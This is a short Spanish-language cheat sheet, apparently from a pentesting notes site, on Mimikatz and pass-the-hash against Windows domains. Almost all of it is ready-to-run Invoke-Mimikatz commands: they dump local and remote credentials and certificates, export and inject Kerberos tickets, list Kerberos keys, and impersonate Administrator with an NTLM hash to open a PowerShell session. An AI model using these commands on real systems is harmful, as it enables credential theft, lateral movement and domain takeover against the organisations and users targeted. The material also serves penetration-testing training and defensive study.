Mimikatz & PassTheHash
Mimikatz
Es la herramienta más usada para extraer hashes y contraseñas de máquinas Windows, que podemos obtener desde su repositorio.
Las credenciales del dominio se almacenan en el fichero ntds.dit en la máquina del Domain Controller (DC).
Obtener credenciales en la máquina local
Invoke-Mimikatz -DumpCreds
Obtener certificados en la máquina local
Invoke-Mimikatz –DumpCerts
Obtener credenciales de varias máquinas remotas
Invoke-Mimikatz -DumpCreds -ComputerName @("sys1","sys2")
Exportar todos los tickets de la máquina
Invoke-Mimikatz -Command '"kerberos::list /export"'
Listar los tickets de los usuarios autenticados en la máquina local
Invoke-Mimikatz –Command '"sekurlsa::tickets"'
Listar claves de cifrado de Kerberos
Invoke-Mimikatz –Command '"sekurlsa::ekeys"'
Inyectar ticket
Invoke-Mimikatz -Command '"kerberos::ptt [email protected]@DOMIAIN.LOCAL_cifs~dcorpmssql.dollarcorp.moneycorp.LOCAL@DOLLARCORP.MONEYCORP.LOCAL.kirbi"'
Pass The Hash (PTH)
Usa el hash NTLM de un usuario para suplantar su identidad. En este caso también abre una consola de powershell.
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:domain.local /ntlm:<ntlmhash> /run:powershell.exe"'
Last updated
Was this helpful?